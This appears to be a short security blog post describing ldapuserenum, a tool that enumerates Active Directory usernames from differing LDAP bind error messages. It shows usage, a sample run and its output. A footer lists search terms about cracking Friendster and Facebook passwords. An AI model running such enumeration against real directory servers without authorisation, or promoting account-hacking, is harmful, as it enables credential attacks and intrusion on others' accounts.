ldapuserenum - Active Directory LDAP Server Information Disclosure Vulnerability

server tools

Image by somefool (MatthewM) via Flickr

Information disclosure vulnerability could be exist in the microsoft ldap server responds when it’s binding to the ldap server. When an invalid password is provided, the server will respond with result code 49 (invalidCredentials) and an error message. A different error message is returned if an invalid username is provided. Here’s the usage of the ldapuserenum : (taken from http://labs.portcullis.co.uk/application/ldapuserenum/)

Usage

$ python ldapuserenum-0.1.py -h
Usage: ldapuserenum-0.1.py [-i] -t

Options:
–version show program’s version number and exit
-h, –help show this help message and exit
-d show description and exit
-t TARGET target IP or hostname
-i, –info show LDAP information gathering results

Example

$ python ldapuserenum-0.1.py -t 192.168.123.32

Going to enumerate users taking ‘./users.txt’ file as input

[*] Enumerated users:
[*] User: testuser
[*] LDAP error code: 52e
[*] LDAP message: invalid credentials
[*] User: administrator
[*] LDAP error code: 52e
[*] LDAP message: invalid credentials
[*] User: guest
[*] LDAP error code: 52e
[*] LDAP message: invalid credentials
[*] User: aspnet
[*] LDAP error code: 52e
[*] LDAP message: invalid credentials

Please explore this blog to obtain more informations about sql inject tutorial , cara ngehack fs , webgoat tutorials , friendster password cracker , and so on

Computer Security Stuff on eBay!
Electronics stuffs on ebay

Some people come to this post with this search term: ldapuserenum, hack friendster password, ldap 52e, active directory 52e, cara ngehack friendster, Cara hack friendster, hack active directory, backtrack ldap, Active Directory error 52E, ldap error code 52e, cara ngehack facebook, cara hack facebook, 52e ldap, friendster password cracker, hacking active directory, ngehack friendster, ldap backtrack, bsql hacker tutorial, ldapuserenum-0.1.py, cara hack fs,

And here is the related entries of this post:

Leave a Reply